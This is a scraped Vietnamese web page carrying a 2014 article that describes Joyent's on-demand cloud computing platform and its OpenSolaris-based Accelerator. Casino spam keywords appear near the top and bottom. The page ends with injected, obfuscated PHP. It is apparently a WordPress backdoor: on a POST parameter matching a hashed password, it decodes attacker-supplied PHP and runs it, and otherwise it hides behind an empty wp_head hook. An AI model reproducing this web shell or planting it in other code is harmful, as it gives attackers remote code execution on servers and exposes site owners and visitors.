JOYENT- giải pháp điện toán theo yêu cầu cho điện toán đám mây
jeu plinko avis pin up catcasino vavada официальный jucky jet

JOYENT- giải pháp điện toán theo yêu cầu cho điện toán đám mây

Ngày 10/11/2014 đăng bởi seo3.VS [email protected]

Joyent có thể không phải là một cái tên quen thuộc mà ai cũng biết như Amazon hay IBM, nhưng đã nhanh chóng có được một danh tiếng ấn tượng là một nhà cung cấp nền tảng điện toán đám mây cho những khởi đầu dựa vào Web. Máy gia tốc Joyent (Joyent Accelerator) mang lại cho bạn nhiều linh hoạt của các nhà cung cấp lưu trữ trên máy chủ truyền thống, nhưng lại có giải pháp điện toán theo yêu cầu cho điện toán đám mây. Với nó, bạn có thể nhanh chóng cho chạy một thực thể hoàn chỉnh với PHP, ngôn ngữ Java hoặc Ruby on Rails được cấu hình sẵn và sẵn sàng sử dụng. Bạn chọn bao nhiêu công suất tính toán theo yêu cầu. Tất cả mọi thứ đang chạy trên OpenSolaris, vì vậy bạn có thể sử dụng tất cả các công cụ thông thường để truy cập và quản lý các tài sản được triển khai với nó, như SSH và FTP.

JOYENT- giải pháp điện toán theo yêu cầu cho điện toán đám mây

Điện toán đám mây của Joyent được thiết kế với suy nghĩ về khả năng mở rộng. Ngay hầu hết các đề xuất có giá phải chăng nhất của nó được thiết kế để xử lý nhưng bùng phát trong sử dụng. Điều này đã làm Joyent rất phổ biến cho các tổ chức đang tạo ra các ứng dụng Facebook thường không cần nhiều sức mạnh, nhưng có thể trải qua nhưng đột biến đáng kể trong sử dụng.

Với Joyent, bất kỳ công nghệ nào tương thích với OpenSolaris đều được hỗ trợ. Điều này bao gồm bất kỳ trong các công nghệ LAMP nguồn mở và các ngôn ngữ lập trình và các ngôn ngữ lập trình khác như các ngôn ngữ Java và Ruby. Joyent cho phép bạn sử dụng bất kỳ các công cụ Linux hoặc UNIX® hiện có nào có sẵn để đảm bảo và duy trì trang Web và dữ liệu của bạn.

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}